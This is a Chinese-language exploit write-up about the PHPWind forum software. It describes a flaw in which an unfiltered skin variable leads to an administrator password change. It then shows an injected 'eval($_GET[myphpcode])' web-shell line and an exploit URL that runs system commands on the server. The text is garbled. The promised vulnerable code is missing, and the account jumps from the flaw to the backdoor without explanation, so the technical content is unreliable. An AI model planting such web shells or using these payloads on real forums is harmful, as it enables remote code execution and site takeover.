PHPWIND 论坛是一款流行的PHP 论坛,界面美观,功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格,它和 DISCUZ 都非常相似,具体原因我想也就不用说了,毕竟 DISCUZ 出来比它要早很多。但安全上它没有继承 DISCUZ 的优点, DISCUZ 论坛安全性非常好,而且商家也对此非常重视安全问题,国内论坛中不论从功能还是安全 , 第一非DISCUZ 莫属。PHPWIND 虽然代码严谨,逻辑清楚,但还是有一些漏洞,而且还相当严重。 一 skin 变量未过滤导致管理员密码更改 废话少说,我们来分析漏洞。漏洞代码如下 (header.php) : eval($_GET[myphpcode]); ?> 大家最好按上面的构造,当然也可以自己构造,不过上面的方法我做过实验,成功率很高。 保存之后,用下面的方法就可以利用了。 http://localhost/phpwind/faq.php?myphpcode=echo system(dir);exit ; 运行后如图 4
可以运行其它PHP语句,在此不在赘述。